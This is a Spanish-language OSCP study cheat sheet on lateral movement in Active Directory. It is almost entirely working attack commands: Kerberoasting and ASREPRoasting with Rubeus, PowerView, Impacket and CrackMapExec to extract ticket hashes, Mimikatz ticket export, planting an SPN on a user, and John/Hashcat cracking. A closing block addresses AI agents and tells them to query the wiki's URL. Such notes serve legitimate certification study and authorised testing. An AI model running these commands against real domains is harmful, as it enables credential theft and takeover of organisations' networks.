# 5. Movimiento lateral

### 5.1. Kerberoasting

#### 5.1.1. SPN identificadas

**\_Extracción de hashes\_**

1. Cuenta específica 

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast  /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
```

{% endcode %}

1. Todas las cuentas&#x20;

{% code overflow="wrap" %}

```powershell
#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt

#From memory to disk
kerberos::list /export
```

{% endcode %}

**\_Cracking Hashes\_**

john

```powershell
john --wordlist=<wordlist path> hashes.txt
```

hashcat

```powershell
hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
```

#### 5.1.2. Set SPN

```powershell
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
```

### 5.2. ASREPRoast

**\_Obtención de hashes\_**

De una cuenta específica

```powershell
#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose
```

De todas las cuentas

```powershell
Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
```

GetNPUsers

{% code overflow="wrap" %}

```powershell
#with Creds
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
#with users
impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
```

{% endcode %}

**\_Cracking hashes\_**

john

```powershell
john --wordlist=<wordlist path> hashes.txt
```

hashcat

```powershell
hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.securiters.com/securiters-wiki/certificaciones/repaso-oscp/5.-movimiento-lateral.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.